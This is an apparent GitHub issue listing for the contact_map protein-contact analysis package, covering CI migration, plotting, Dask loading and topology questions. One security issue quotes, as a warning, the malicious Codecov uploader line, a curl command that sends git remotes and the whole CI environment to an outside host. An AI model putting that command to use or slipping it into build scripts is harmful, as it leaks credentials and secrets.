
contact_map's People

Contributors

dwhswenson, nffaruk, sroet

contact_map's Issues

How are "contacts" defined?

Hi Dr. Swenson,
I am currently undertaking a Chemistry Master’s project in Dr. Toni Mey’s (@ppxasjsm) group at the University of Edinburgh. I have been using your contact map explorer programme to analyse protein-ligand binding interactions. It’s been a great help in determining which contacts are most common and was also very easy to use.
I have a question regarding what constitutes a “contact”. I have read in the documentation that a variety of both inter- and intramolecular contacts are found, but I wasn't able to figure out how contacts are calculated and assigned. Could you please let me know what is classified as a contact and how contacts are calculated, or point me in the direction of the documentation? Furthermore, is there any functionality within contact map explorer to show which types of contacts are present? Thanks in advance for your response!
Victor

What to do with the new travis.com plan?

https://blog.travis-ci.com/2020-11-02-travis-ci-new-billing

So the big point for us would be:

For those of you who have been building on public repositories (on travis-ci.com, with no paid subscription), we will upgrade you to our trial (free) plan with a 10K credit allotment (which allows around 1000 minutes in a Linux environment).

So it seems they are giving a one-time allotment of 1000 minutes, which would get us 67 nightly builds at 15 min per build, and that is without you as a user running any other jobs. (The free plan explicitly says it does not replenish credits.)

I found two options to go forward:

  1. Apply for repeated open-source credits for this project

We will be offering an allotment of OSS minutes that will be reviewed and allocated on a case by case basis. Should you want to apply for these credits please open a request with Travis CI support stating that you’d like to be considered for the OSS allotment. Please include:

Your account name and VCS provider (like travis-ci.com/github/[your account name] )
How many credits (build minutes) you’d like to request (should you run out of credits again you can repeat the process to request more or discuss a renewable amount)

  2. Switch to Azure for CI https://azure.microsoft.com/en-us/blog/announcing-azure-pipelines-with-unlimited-ci-cd-minutes-for-open-source/

@dwhswenson do you have any other options/ an opinion on which way to go forward? (No worries if you don't have time to figure out the switch, I might be able to spend a couple hours figuring that out)

Looking around, it seems like Azure is getting more and more adoption, so I am +0.5 on that option, but I am willing to default to your opinion here.

dask example not working

For me the dask example stopped working (test still runs fine):

I even tried to run it in pure python

>>> from dask.distributed import Client, LocalCluster
>>> import contact_map
>>> c = LocalCluster()
>>> client = Client(c)
>>> client
<Client: scheduler='tcp://127.0.0.1:37437' processes=4 cores=12>
>>> freq = contact_map.DaskContactFrequency(client=client, filename="5550217/kras.xtc", top="5550217/kras.pdb")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/sander/github_files/contact_map/contact_map/dask_runner.py", line 91, in __init__
    trajectory, query, haystack, cutoff, n_neighbors_ignored,
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 744, in __init__
    self._atom_contacts = self.convert_atom_contacts(atom_contacts)
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 653, in convert_atom_contacts
    for key, value in atom_contacts.items()}
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 653, in <dictcomp>
    for key, value in atom_contacts.items()}
  File "/home/sander/github_files/contact_map/contact_map/contact_map.py", line 200, in s_idx_to_idx
    return(self._all_atoms[idx])
IndexError: tuple index out of range
versions:
dask                      1.1.5                      py_0    conda-forge
dask-core                 1.1.5                      py_0    conda-forge
distributed               1.26.1                   py36_0    conda-forge
python                    3.6.7             h381d211_1004    conda-forge

"Autozoom" plotting

I find that I'm frequently doing something like:

plt.xlim(*contacts.query_residue_range)
plt.ylim(*contacts.haystack_residue_range)

This zooms my plot into just the query-by-haystack region. This should be the default behavior.

To get there, I'm suggesting the following:

  1. [API BREAK] Replacing n_x, n_y in ContactCount with query_range and haystack_range. The original idea of separate n_x and n_y was to do something like this, but the original implementation didn't work, and now everything just uses n_x = n_y = n_total (where the total can be residues or atoms).
  2. Adding a default parameter autozoom=True to the .plot and .plot_axes methods.
  3. Updating the dpi warning in .plot to know what the autozoomed size will be.
  4. [API BREAK] Remove ContactObject.query_residue_range, ContactObject.haystack_residue_range. They exist entirely for this purpose.

For discussion: is the query the x axis or the y axis?
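However that axis question is resolved, a minimal helper wrapping today's workaround (using the existing query_residue_range / haystack_residue_range properties, and assuming the query is plotted on the x axis, as in the snippet above) might look like:

import matplotlib.pyplot as plt

def autozoom(contacts, ax=None):
    # Sketch, not library API: zoom the given axes to the query-by-haystack region.
    ax = ax if ax is not None else plt.gca()
    ax.set_xlim(*contacts.query_residue_range)    # assumes query on the x axis
    ax.set_ylim(*contacts.haystack_residue_range)  # assumes haystack on the y axis
    return ax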

[Security] invalidate all CI secrets

@dwhswenson

The github-action script of codecov was compromised to send the full CI env info to a third party. You might need to invalidate all CI secrets. (I don't know if you have any that are worth rotating, just making sure you are aware of the issue.)

codecov reference
The maliciously added line of code:

curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://<redacted>/upload/v2 || true

Discussion: Moving off of AppVeyor

This issue is to discuss whether we should move away from AppVeyor as a testing platform. This is in part a response to problems in #118, although I've been thinking about this for a while.

Historically, we used AppVeyor because Travis-CI didn't have free Windows builds. Now we've moved from Travis-CI to GitHub Actions for our Linux builds, and GitHub Actions does allow free Windows builds.

We also use two different build processes. The Linux builds install requirements with pip, getting packages from PyPI. The Windows builds use conda-build, getting packages from conda-forge. This can be nice because sometimes packages have slight differences in their dependencies (most frequently, they include some extras on conda-forge that don't come with the package when you install with pip). Testing both ensures that we aren't implicitly relying on something that only comes through one distribution mechanism.

The problems with the current Windows builds:

  1. AppVeyor only allows one simultaneous build, so even running only 2 builds takes a while.
  2. The actual build process (via conda-build) is slower on Windows, which exacerbates the problem of not having simultaneous builds.
  3. With our current build process, we need to wait for AppVeyor to update Miniconda versions. Our build doesn't seem to work on their Miniconda38, and there is no Miniconda39. So we're limited to Python 3.7.
  4. The conda-build based build is unnecessary. This is because I mimicked what MDTraj did. We don't actually need conda-build, since we're not compiling anything. We can install requirements with conda if we want. This will also get rid of the need for the recipe in devtools -- that recipe is completely independent of the conda forge feedstock recipe, and is only used for the AppVeyor build.

So I think it makes sense to move Windows builds over to GitHub Actions as well. I haven't used Windows builds on GHA yet, so I'd love to hear anyone else's experiences with it (@sroet, have you used that?)

A few specific points to consider:

  • Build matrix: Which versions do we test against? I suggest only 2 (to keep build matrix smaller) and having those be the newest version of Python and the oldest NEP29-required version, and only testing against the release version of MDTraj (we test against development builds on Linux).
  • Where to get packages from: I think we should drop conda-build, but maybe continue to get packages from conda.

Anything else to consider? Any thoughts on these?

how to extract some special contacts

Hi,

I'm trying to calculate the contact map related to helical structure. I first got the contacts from ContactTrajectory, and then tried to delete the items whose residues were not helical. But it doesn't work. Here is the part of my script:

contacts = ContactTrajectory(traj)
for i in range(nframe):
    pairs = contacts[i].residue_contacts.most_common()
    hels = dssp[i]     # information of residue helicity
    for idx, pair in enumerate(pairs):
        r1, r2 = pair[0][0], pair[0][1]
        if not (hels[r1.index] == 'H' and hels[r2.index] == 'H'):
            del contacts[i].residue_contacts.most_common()[idx]

I think I had some misunderstanding here. Any suggestions?
Thank you so much!
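One likely issue: most_common() returns a freshly built list each time it is called, so del on that list never changes the stored contacts. A minimal sketch of an alternative, collecting only the helix-helix pairs into a separate structure (assuming the DSSP codes are indexed by mdtraj residue index):

helical_contacts = []
for i in range(nframe):
    pairs = contacts[i].residue_contacts.most_common()
    hels = dssp[i]  # per-residue DSSP codes for frame i
    # keep a pair only when both residues are helical in this frame
    kept = [(pair, freq) for pair, freq in pairs
            if hels[pair[0].index] == 'H' and hels[pair[1].index] == 'H']
    helical_contacts.append(kept)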

The calculated results are inconsistent with those calculated by amber cpptraj

Dear developers, I'm studying multiple different peptides binding to a receptor and analyzing the differences in the contacts they make. First, I used cpptraj to calculate nativecontacts as a reference, because the results calculated with ContactFrequency could not display the residue numbers separately for the peptides and the receptor, so all the structures end up mixed together even if I set the query and haystack. That is only an inconvenience, though, not fatal. I compared the results calculated by cpptraj and contact_map and found that cpptraj reports more contact residue pairs and much higher contact frequencies. How do I interpret this result?
My code is as follows:

freq = ContactFrequency(traj, query=ligand, haystack=receptor, cutoff=0.7)
contact_lists = []
freq.residue_contacts.most_common_idx()
for i in range(len(freq.residue_contacts.most_common_idx())):
    tup = freq.residue_contacts.most_common_idx()[i]
    if tup[1] > 0.2:
        contact_lists.append(list(tup[0])[1])
set(contact_lists)

and my cpptraj code:
nativecontacts :1-255&!@h= :256-356&!@h= byresidue distance 7 out nc_by_frame.dat mindist maxdist
resout contact_frac_byres.dat \

Relevant results have been placed in the attachment
contact_frac_byres.txt

contact_map_output.txt

How to display contacts of atoms within the same residue?

I'm comparing contact maps of a single protein in 2 different conformations. I'm looking only at contacts of the backbone nitrogen with the rest of the protein (i.e. query == N, haystack is the default). This works with no issues, except I've noticed that the reported contacts only involve atoms of amino acids other than the one you are looking at. So you get something like
[ARG190-CB, VAL375-N] 1.0
But you will never get something like
[VAL375-CB, VAL375-N] 1.0

I was curious whether there is a way to include atom contacts within the same residue (while the change in N-backbone interactions probably won't be much, side chains, especially long ones like lysine, can undergo significant rearrangement relative to the amide backbone).

Changing colorbar font size

How do I go about changing the font size of the colorbar?

Using:
fig, ax = frame_contacts.residue_contacts.plot(figsize=(50,50),cmap="plasma")
This increases the graph size, but the font size of the colorbar doesn't scale. I set the axis labels and tick label sizes with:
plt.xlabel("Residue",fontsize=50)
_ = plt.ylabel("Residue",fontsize=50)
ax.xaxis.set_tick_params(labelsize=30)
ax.yaxis.set_tick_params(labelsize=30)

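A hedged workaround sketch: plot() returns the figure and the main axes, and the colorbar lives on its own axes, so (assuming the colorbar axes is the last one added to the figure, which is how matplotlib's fig.colorbar usually behaves) its tick labels can be resized directly:

fig, ax = frame_contacts.residue_contacts.plot(figsize=(50, 50), cmap="plasma")
cbar_ax = fig.axes[-1]            # assumption: the colorbar axes is the last axes on the figure
cbar_ax.tick_params(labelsize=30)  # resize the colorbar tick labels
ax.xaxis.set_tick_params(labelsize=30)
ax.yaxis.set_tick_params(labelsize=30)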

Always show at least one pixel for plotting

It is currently possible (especially for atom-atom plots) for the size of one contact to be smaller than a single pixel. The result is that many contacts aren't actually shown. This is very misleading.

We should update the contact object plot so that the dimensions of the patch are guaranteed to be at least 1 pixel. Currently each contact patch gets 1 unit on the axis; we need to figure out how many axis units correspond to 1 pixel (via matplotlib's resolution).

I think it is fine if we slightly overestimate; this will be a min function, so it will still give a distance of 1 pixel if pixel_per_axis_unit > 1.
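A rough sketch of the unit-to-pixel conversion via matplotlib's transforms (assuming the figure has already been drawn so the layout is computed; the clamp here is written in axis units):

import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.set_xlim(0, 5000)          # e.g. an atom-atom map spanning 5000 atoms
fig.canvas.draw()             # make sure the layout and transforms are up to date
x0, x1 = ax.get_xlim()
width_px = ax.get_window_extent().width   # axes width in pixels
units_per_pixel = (x1 - x0) / width_px
patch_width = max(1.0, units_per_pixel)   # never draw a patch smaller than one pixel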

Regenerate webhook for read the docs

@dwhswenson I assume you got the same emails as me, but I don't have the permissions to fix it. (don't have admin rights on this repo or on RtD)

Our current RtD webhook does not seem to use a secret, which will be required from January 31!
You should click on the 3 links and "resync webhooks", which should update the secret.
(I couldn't test it, though; if I try it I get the error: Webhook activation failed. Make sure you have the necessary permissions.)

ContactMap/ContactFrequency on a set of individual pdb (not trajectory)

I'm working with protein-protein docking output and would like to use ContactMap/ContactFrequency to classify the contacts formed in a set of protein-protein complexes.

Basically, I have a condition (condition A) that leads to a set of protein-protein complexes. I have another condition (condition B) that leads to a different set of protein-protein complexes.

I'd like to assess differences between the contacts formed in complexes under condition A and contacts formed in complexes under condition B. What would be the best way to do this? I have multi-structure PDB files for both condition A and condition B.
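A minimal sketch of one approach, assuming each multi-structure PDB loads with MDTraj as a multi-frame trajectory (file names below are placeholders): build a ContactFrequency per condition and compare them with ContactDifference.

import mdtraj as md
from contact_map import ContactFrequency, ContactDifference

cond_a = md.load("condition_A_complexes.pdb")   # placeholder file names
cond_b = md.load("condition_B_complexes.pdb")
freq_a = ContactFrequency(cond_a)
freq_b = ContactFrequency(cond_b)
diff = ContactDifference(freq_a, freq_b)        # requires compatible topologies
diff.residue_contacts.plot()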

Renaming `ContactFrequency` to `ContactMap`; removing old `ContactMap`

Current status (tl;dr for users): For a single-frame contact map, you should use ContactFrequency with a single-frame trajectory.

#cmap = ContactMap(traj, frame=0)  # old
cmap = ContactFrequency(traj[0])  # new

As of 0.7.0 (including the development branch), using ContactMap will give an error.

(original post follows)


Currently, Contact Map Explorer has classes ContactMap and ContactFrequency. Really, a ContactMap is nearly indistinguishable from a ContactFrequency with only one frame -- at least, I don't think there's anything ContactMap does that ContactFrequency doesn't -- so it seems logical to remove the extra code.

Here's my proposed process for doing that:

  • 0.6.0: Deprecate ContactMap
  • 0.7.0: Remove ContactMap; leave a function that gives an error saying to use ContactFrequency. Also, add a FutureDeprecationWarning on ContactFrequency for the name change to ContactMap
  • 0.8.0 or 1.0.0: Deprecate ContactFrequency, with the ContactMap name preferred. Leave a deprecated ContactFrequency until 2.0 (which may be a very long time).

Each release will also include other features, but I'm going to encourage a fast release cycle here (add a new feature-level change? good reason for a new release!) Unfortunately, that also means that even if this is a reasonable timeline in terms of version numbers, it'll be a fast timeline in terms of months. (I hope.)

Thoughts on this? I plan to pin this issue for a while well after the rename is complete, so any confused users can easily find it.

ContactFrequency to pandas dataframe

Dear all,

I really like using Contact Map Explorer! I was wondering if there is a way to create a pandas dataframe out of a ContactFrequency calculation.

Like:

import mdtraj as mdt
import pandas as pd
from contact_map import ContactFrequency

traj = mdt.load('trajectory.h5')
topology = traj.topology
peptide = topology.select('chainid 1 and element != "H"')
protein = topology.select('chainid 0 and resid 77 or resid 124 or resid 130 or resid 137 and element != "H"')
contacts = ContactFrequency(traj, query=peptide, haystack=protein, cutoff=0.45)
df = pd.DataFrame(contacts)

where the query would be the columns and the haystack the rows or the other way round, doesn't matter.
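A minimal sketch of one way to do this conversion by hand (assuming, as in the other issues here, that most_common() yields ([residue_1, residue_2], frequency) entries):

import pandas as pd

records = [
    {"residue_1": str(pair[0]), "residue_2": str(pair[1]), "frequency": freq}
    for pair, freq in contacts.residue_contacts.most_common()
]
long_df = pd.DataFrame(records)
# one row/column per residue in each pair; which side is query vs. haystack depends on the contact
wide_df = long_df.pivot(index="residue_2", columns="residue_1", values="frequency")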

Thanks for your effort!
Have a nice day.

Residue_Contacts() generates contacts beyond the cutoff and plot() and most_common() contacts do not match

I'm a bit confused about why I am getting this behavior. I am using chain A of PDBs 1mmi and 1jql.

Looking at the contact map difference

import mdtraj as md
from contact_map import ContactFrequency
from contact_map import AtomMismatchedContactDifference
import matplotlib.pyplot as plt


extended_monomer=md.load('1mmi.pdb')
bent_monomer=md.load('1jql.pdb')
extended_map=ContactFrequency(extended_monomer)
bent_map=ContactFrequency(bent_monomer)
difference = AtomMismatchedContactDifference(extended_map, bent_map)
difference.residue_contacts.plot()
plt.show()

We can see a contact being reported between residues 136/353. Looking at the pdb for these residues, they are not even remotely close (20 Å apart). The same is also true of contacts 140/356 and 140/358.

What's strange is if I try and look at the contacts for 353

difference.residue_contacts.most_common(difference.topology.residue(353))

For 1, it doesn't connect to the proper residue

[([SER354, ALA357], 1.0), ([ARG137, SER354], 1.0), ([SER354, GLU350], 0.0), ([SER354, ASP351], 0.0)]

I don't know why it's connecting to the residue after it (i.e. 354 instead of 353). But for 2, even if we look at SER354, none of these matches line up with the contact map plot. The same is true of ALA353: it shows contacts in the plot, but nothing in most_common(). This is because there is a difference between most_common() and the plot. If I look at the pair_list for SER354

[354, 349] 0.0
[336, 354] -1.0

Versus the most_common() output for SER354

[([SER354, ALA357], 1.0), ([ARG137, SER354], 1.0), ([SER354, GLU350], 0.0), ([SER354, ASP351], 0.0)]

These are completely different. The same is true for ALA357, where most_common() showed no contacts, but looking at the pair_list being plotted

[353, 356] 1.0
[353, 349] 0.0
[353, 350] 0.0
[136, 353] 1.0

We can see there are actually 2 contacts (one of them being the nonsensical 136/353). The same goes for SER354, where we can see a nonsensical contact ([ARG137, SER354], 1.0); these residues are much farther apart than the cutoff. Setting the cutoff manually does not fix this.

What's interesting is that this appears to be an issue isolated to residue_contacts(). If I modify the pdb files so that their atoms perfectly match, the contacts make sense (SER368 is the same as SER354, just different numbering):

([SER368-N, ASP365-OD2], 0.0) ([SER368-N, ASP365-O], 0.0) ([SER368-N, ASP365-CB], 0.0) ([SER368-N, ASP365-OD1], 0.0) ([SER368-N, ASP365-CG], 0.0) ([SER368-N, ASP365-C], -1.0)

However, the contact map plot for the identical-atom pdbs doesn't match the contacts. If we look at the pairs being plotted

[368, 189] 0.0 [368, 358] 0.0 [368, 359] 0.0 [368, 191] 0.0 [360, 368] 0.0 [368, 190] 0.0

For 1, it differs from the most_common() contacts.
[([GLU364, SER368], 0.0), ([ASP365, SER368], 0.0), ([SER368, ARG151], -1.0), ([SER368, ALA371], -1.0)]
For 2, it has nonsensical results again (368/190 are 20 Å apart).

Furthermore, the command

difference.residue_contacts.most_common(difference.topology.residue(364))

is offset by 4 in this scenario for some reason (i.e. residue 364 coincides with the SER368 matches). It should be noted this only happens when using this command; if I loop through the contacts themselves

for items in difference.residue_contacts.most_common():
	if str(items[0][0]) == 'SER368' or str(items[0][1]) == 'SER368':
		print(items)

This has no issue.

So in total, there appear to be 3 issues:

  1. The plots do not match the contacts in most_common(), whether the atoms are identical or AtomMismatchedContactDifference is used. Either method results in matches where the contact map plot does not correlate with the contacts themselves. I do not know if this was intentional.
  2. residue_contacts() generates nonsensical contacts far beyond the cutoff -- contacts that do not exist when looking at the atom-level contacts (which do make sense).
  3. difference.residue_contacts.most_common(difference.topology.residue(res)) has an indexing issue (looping through difference.residue_contacts.most_common() shows there is nothing offset in there, so the issue is with topology.residue itself).

I have tested all of the above issues while playing around with neighbors ignored, different queries, and different cutoffs. None of them fixed the problems above. These were tested in a virtual environment.

I don't quite know where these problems are arising.

Smarter loading for Dask based implementations

As mentioned in #101, there are some limitations of DaskContactFrequency, mainly:

  • The whole trajectory has to fit into memory, as it is loaded once to figure out the length and then again by every worker to slice out their part of the trajectory.
  • We only support loading a single trajectory file at the moment.

Both these issues should be solvable with a somewhat smart implementation of mdtraj.iterload with a sensible skip and splitting out trajectories.
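A minimal sketch of the chunked idea (plain Python, not the Dask implementation itself), using mdtraj.iterload together with the add_contact_frequency method mentioned in the ContactTrajectory issue elsewhere in this tracker; file names are placeholders:

import mdtraj as md
from contact_map import ContactFrequency

total = None
for chunk in md.iterload("traj.xtc", top="top.pdb", chunk=100):
    partial = ContactFrequency(chunk)
    if total is None:
        total = partial
    else:
        total.add_contact_frequency(partial)  # accumulates the absolute counts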

Bug in atom_contacts.sparse_matrix in ContactFrequency

When running the following code in an IPython notebook:

trajectory_contacts = ContactFrequency(traj[0:2])
ac = trajectory_contacts.atom_contacts.sparse_matrix

I get the following error:

---------------------------------------------------------------------------
IndexError                                Traceback (most recent call last)
<ipython-input-10-f9dfcb5a25ab> in <module>()
----> 1 get_ipython().run_cell_magic(u'time', u'', u'trajectory_contacts = ContactFrequency(traj[0:2])\nac = trajectory_contacts.atom_contacts.sparse_matrix')

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/IPython/core/interactiveshell.pyc in run_cell_magic(self, magic_name, line, cell)
   2113             magic_arg_s = self.var_expand(line, stack_depth)
   2114             with self.builtin_trap:
-> 2115                 result = fn(magic_arg_s, cell)
   2116             return result
   2117 

<decorator-gen-59> in time(self, line, cell, local_ns)

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/IPython/core/magic.pyc in <lambda>(f, *a, **k)
    186     # but it's overkill for just that one bit of state.
    187     def magic_deco(arg):
--> 188         call = lambda f, *a, **k: f(*a, **k)
    189 
    190         if callable(arg):

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/IPython/core/magics/execution.pyc in time(self, line, cell, local_ns)
   1183         else:
   1184             st = clock2()
-> 1185             exec(code, glob, local_ns)
   1186             end = clock2()
   1187             out = None

<timed exec> in <module>()

/home/sanderroet/github_files/contact_map/contact_map/contact_map.pyc in sparse_matrix(self)
    114         for (k, v) in self._counter.items():
    115             key = list(k)
--> 116             mtx[key[0], key[1]] = v
    117             mtx[key[1], key[0]] = v
    118         return mtx

/home/sanderroet/anaconda3/envs/python2/lib/python2.7/site-packages/scipy/sparse/dok.pyc in __setitem__(self, index, x)
    268         if min_i < -self.shape[0] or i.max() >= self.shape[0]:
    269             raise IndexError('index (%d) out of range -%d to %d)' %
--> 270                              (i.min(), self.shape[0], self.shape[0]-1))
    271         if min_i < 0:
    272             i = i.copy()

IndexError: index (2457) out of range -1357 to 1356)

While the code works for

frame_contacts = ContactMap(traj[0])
sm = frame_contacts.atom_contacts.sparse_matrix

Enhancement: ContactTrajectory class (with movies!)

It might be nice to add a ContactTrajectory class. This would store a separate (single frame) contact map for each time slice. Then you could do interesting things like create a ContactFrequency based on a set of frames determined after the fact. You could also create movies of how the contact map evolves in time (these should be based on some windowing into ContactFrequency instances; the window can be 1 if the user wants).

Relevant matplotlib docs on animation:

Animations that could be generated in real time would be impressive, but I'd be just as happy with something that pre-generates the images and makes a movie out of them, like ArtistAnimation does.

Note that, to use a rolling window to generate the contact frequency plots for each movie frame, we already have add_contact_frequency and subtract_contact_frequency methods. These affect the absolute histogram count, unlike ContactDifference, which compares the after-normalization (to number of frames) contact frequencies. We'd still output a separate plot at each time step, but the underlying data would be cheaper to calculate.
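A minimal sketch of the pre-generated approach with ArtistAnimation, using plain matplotlib imshow on hypothetical dense per-window matrices (per_window_matrices is a placeholder, not an existing contact_map API):

import matplotlib.pyplot as plt
from matplotlib.animation import ArtistAnimation

fig, ax = plt.subplots()
artists = []
for mtx in per_window_matrices:      # hypothetical: one dense residue matrix per window
    im = ax.imshow(mtx, vmin=0, vmax=1, animated=True)
    artists.append([im])
anim = ArtistAnimation(fig, artists, interval=200, blit=True)
anim.save("contact_map_movie.mp4")   # requires ffmpeg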

Renaming `master` branch to `main`

I'm planning to rename the master branch here to main. My thoughts on this are fully discussed in openpathsampling/openpathsampling#956, so I won't repeat them here.

With the exceptions of Contact Map Explorer and OpenPathSampling, all projects that I maintain on PyPI have already made this switch -- I've been working up from the small projects to the larger ones.

Here are instructions that users will need to follow to make this change (note you'll have to change the default branch of your fork via the GitHub web interface).

As for timing, I'd like to do this immediately after we release 0.8 (which is waiting on two currently open PRs plus one PR I need to open that renames ContactFrequency as ContactMap).

Fix docs build problems

We're having problems building the docs on RTD. I think this is the same problem as readthedocs/readthedocs.org#5220, and is likely related to memory issues (see https://docs.readthedocs.io/en/stable/guides/build-using-too-many-resources.html).

I think the possible fixes are:

  1. Pin versions in the RTD docs environment.yml (as with geopandas/geopandas#932)
  2. Don't use conda for RTD install. Perhaps we don't need all reqs to build the docs?

Self-assigning, since I'm the only one with access to the docs on RTD.

How to calculate the CA distance between two residues?

Besides,

According to the PDB file of a protein, we acquired the coordinate of the Ca
atom of each amino acid residue, and then calculated the Euclidean
distances between all residue pairs.

How can I do the above with contact_map?
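For the raw Cα distances themselves, a sketch using MDTraj directly (contact_map is built on MDTraj; the file name below is a placeholder):

import itertools
import numpy as np
import mdtraj as md

traj = md.load("protein.pdb")                  # placeholder file name
ca_atoms = traj.topology.select("name CA")     # one CA atom per residue
pairs = np.array(list(itertools.combinations(ca_atoms, 2)))
distances = md.compute_distances(traj, pairs)  # shape (n_frames, n_pairs), in nm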

Use Google Colab to load ipynb examples directly from documentation?

Looking at this link.
Together with the !pip install contact-map Jupyter magic, it should be feasible to allow people to run our examples from the website directly in their browser, without any download required.
I think this would be a good idea to implement in our read the docs template for the examples (especially the badge mentioned in the link).

@dwhswenson what do you think?

Contact Difference of two trajectories

Dear all,

Contact Map Explorer was recommended to me and so far I really like it! I am looking at two peptide trajectories. What I want to do next, but can't get working, is to compare the two trajectories with ContactDifference. I created the two ContactFrequencies

trajectory_contacts1 = ContactFrequency(traj1, cutoff=0.55)
trajectory_contacts2 = ContactFrequency(traj2, cutoff=0.55)

but when I do diff=ContactDifference(trajectory_contacts1, trajectory_contacts2) I get the error:

AssertionError: Incompatible ContactObjects:
        topology: <mdtraj.Topology with 1 chains, 15 residues, 258 atoms, 262 bonds> != <mdtraj.Topology with 1 chains, 15 residues, 239 atoms, 243 bonds>

which is true: the number of atoms is different, but the number of residues is the same.

My question is: is there a way to subtract one from the other to generate a difference plot?
If not, can I get the values of the contact map so I can do this manually?

Any help or hint is appreciated,
Thank you :)

Subplots for ContactFrequency

Hello again, how would we go about arranging the plots generated through the plot method of ContactCount for different trajectories as subplots? I've tried this Stack answer without any luck. Perhaps there should be an option to provide an existing figure or axis object to the plotting method? Thank you,
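A hedged sketch of that idea: if plot_axes (mentioned in the autozoom issue above) can draw onto a user-supplied matplotlib Axes (an assumption here, not confirmed API), subplots would look like:

import matplotlib.pyplot as plt

fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 5))
# assumption: plot_axes accepts an existing Axes to draw onto
contacts_1.residue_contacts.plot_axes(ax=ax1)
contacts_2.residue_contacts.plot_axes(ax=ax2)
fig.tight_layout()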

Error while saving DaskContactFrequency & DaskContactTrajectory instances to pkl file

When attempting to save a DaskContactFrequency or DaskContactTrajectory instance to a pkl file, I receive the following error message:

---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
Cell In[13], line 1
----> 1 freq.save_to_file("contacts.p")

File /panfs/jay/groups/21/sarupria/gopal145/software/contact_map/contact_map/contact_map.py:371, in ContactObject.save_to_file(self, filename, mode)
    356 """Save this object to the given file.
    357 
    358 Parameters
   (...)
    368 from_file : load from generated file
    369 """
    370 with open(filename, mode+"b") as f:
--> 371     pickle.dump(self, f)

AttributeError: Can't pickle local object 'Client.__init__.<locals>.<lambda>'


 

From an online search, it appears that pickling fails when the saved object contains references to lambda functions. However, I am unable to find any lambda functions in the save_to_file method or in the dask_runner module.

Option to turn off topology compatibility check in `ContactDifference`

Let's say I have a trajectory of a wild type protein and a trajectory of that protein with a point mutation. I might be interested in looking at the difference in the (residue) contact maps for these. The current code forbids it, because ContactDifference requires that topologies between the two contact frequencies be equal.

I think we can make this possible with the following:

  1. Add a check_topology parameter to ContactObject._check_compatibility (defaults to True).

  2. Add a check_topology parameter to ContactDifference.__init__ (defaults to True). If check_topology is False and if positive.topology != negative.topology, then it will refuse to build the atom_contacts, but will build the residue_contacts.

The only way you'll be able to build this will be with diff = ContactDifference(pos, neg, check_topology=False) -- so a user has to really intend to do this for it to happen. But at least it is possible.

@sroet : Am I overlooking anything scientifically in this? Can you think of any reason that this wouldn't work?

The idea presented here would only work to compare trajectories with point mutations. I've been thinking about some "re-topologizing" functionality for MDTraj (e.g., breaking a single residue into parts). Including the possibility of inserting some empty residues would enable users to create meaningful contact map differences between different proteins, as long as they can create a sequence alignment.
